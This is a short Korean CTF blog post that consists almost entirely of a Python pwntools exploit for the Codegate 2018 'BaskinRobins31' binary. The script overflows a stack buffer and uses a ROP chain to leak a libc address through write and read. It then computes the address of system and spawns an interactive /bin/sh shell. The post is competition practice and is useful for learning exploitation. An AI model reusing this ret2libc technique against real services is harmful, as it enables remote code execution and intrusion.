hOwDayS 선린 10720

Codegate 2018 BaskinRobins 본문

CTF

Codegate 2018 BaskinRobins

hOwDayS 2018. 2. 9. 10:38
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
 
= process("./BaskinRobins31")
= ELF("./BaskinRobins31")
 
write_plt = e.plt["write"]
write_got = e.got["write"]
 
read_plt = e.plt["read"]
read_got = e.got["read"]
 
pop3 = 0x40087a #pop rdi , rsi , rdx
pop_rdi = 0x400bc3
 
system_offset = 0x45390
read_offset = 0xf7250
 
bss = 0x602100 # 0x602090 + 0x70 
 
libc_base = 0
system_addr = 0
payload = ""
def ex_():
 
        payload = "A" * 184
        # read_got
        payload += p64(pop3)
        payload +=p64(1)
        payload +=p64(read_got)
        payload +=p64(8)
        payload +=p64(write_plt)
        #end
        payload +=p64(pop3)
        payload +=p64(0)
        payload +=p64(bss)
        payload +=p64(len("/bin/sh\00"))
        payload +=p64(read_plt)
        #end
        #return to main
        payload += p64(e.symbols["main"])
        #end
        s.sendline(payload) #send payload
        print s.recvuntil("Don't break the rules...:( \n")
        read_addr= u64(s.recv(8))
        libc_base = read_addr - read_offset
        system_addr = system_offset + libc_base
        log.info("read_addr : " + hex(read_addr))
        log.info("libc base : " + hex(libc_base))
        log.info("system_addr : " + hex(system_addr))
 
        s.send("/bin/sh")
 
        payload3 = "A" * 184
        #call system
        payload3 +=p64(pop_rdi)
        payload3 +=p64(bss)
        payload3 += p64(system_addr)
        #end
        s.sendline(payload3)
        sleep(1)
s.recv(1024)
ex_()
s.interactive()
                 
 
cs


하  \n을 안넣었다

'CTF' 카테고리의 다른 글

TRSUTCTF sysrop  (0) 2018.03.08
ROOTCTF Allocate  (0) 2018.03.04
TRUSTEALTH rpggame  (0) 2018.03.03
0ctf babyheap  (0) 2018.03.01
ROOTCTF Factorization  (0) 2018.02.20
'CTF' Related Articles more
Comments